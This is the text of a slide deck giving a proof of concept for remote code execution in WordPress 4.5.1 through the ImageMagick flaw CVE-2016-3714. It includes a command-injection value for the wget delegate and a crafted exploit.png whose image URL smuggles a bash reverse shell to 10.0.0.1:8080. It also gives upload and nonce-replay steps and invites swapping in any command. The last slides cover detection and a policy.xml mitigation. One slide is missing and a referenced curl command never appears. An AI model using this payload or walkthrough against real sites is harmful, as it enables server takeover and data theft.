1. Remote Code Execute Wordpress 4.5.1
AUTHER: SINA YEGANEH
EMAIL:SINAAA.YEAGNEH@GMAIL.COM
2. ImageMagick
Imagick is a native php extension to create and modify images
using the ImageMagick API.
ImageMagick is a software suite to create, edit, and compose
bitmap images. It can read, convert and write images in a variety of
formats (over 100) including DPX, EXR, GIF, JPEG, JPEG-2000, PDF,
PhotoCD, PNG, Postscript, SVG, and TIFF.
3. Image Magick Vulnerability Information
A few days ago an Image Magick vulnerability was disclosed CVE-
2016-3714
This vulnerability resolve pictures from Magiccore/constitute.c of
ReadImage Function , if the image address is https:// at the
beginning ,that call InvokeDelegate
4. Exploit ImageMagick
One of the default delegate commands uses the following to
handle HTTPS requests:
"wget" -q -O "%o" "https:%M”
where %M is the actual link from the input. It is possible to pass the
value like:
example.com"|ls "-la
5. How is WordPress affected?
WordPress select a Library for Editing Images. WordPress image
processing use Imagick Library by default.
6. How is WordPress affected?
If WordPress Select Imagick Library Then Load it.
7. How is WordPress affected?
get_attached_file function in wp_crop_image function invoke system
function mentioned in library
8. Poc
Upload an normal image format
With Author permissions login to account, publish an article, insert
the Media.
9. Poc
Create exploit.png file :
push graphic-context
viewbox 0 0 640 480
fill 'url (https://example.com/image.jpg "|bash -i >& /dev/tcp/10.0.0.1/8080 0>&1”)'
pop graphic-context
Upload Exploit.png and add to Post
10. poc
click on our normal picture , select Edit , then edit Orginal
12. poc
Then click the broken image
Edit and Edit Original, check
requests listed on network
and find admin-ajax.php
see requests with ‘post’
type, copy _ajax_nonce
And postid parameter.
13. poc
Paste New Parameters from Broken Image to Curl Command mentioned before
Proof of Concept By Getting Connect Back
(Change bash command As you wish)
14. How do I know if my site is
vulnerable?
Inspect the output of the phpinfo() function for “Imagick”.
Run php -m | grep imagick on the command line.
15. How do I patch the vulnerability?
Currently the best known fix is to add a policy.xml file to your ImageMagick
installation to limit the delegates that ImageMagick will use. Due to the ongoing
nature of this issue, we recommend you refer to and follow
https://imagetragick.com/ for instructions on how to handle the problem.
Documentation on the policy.xml file can be found at
https://www.imagemagick.org/script/resources.php.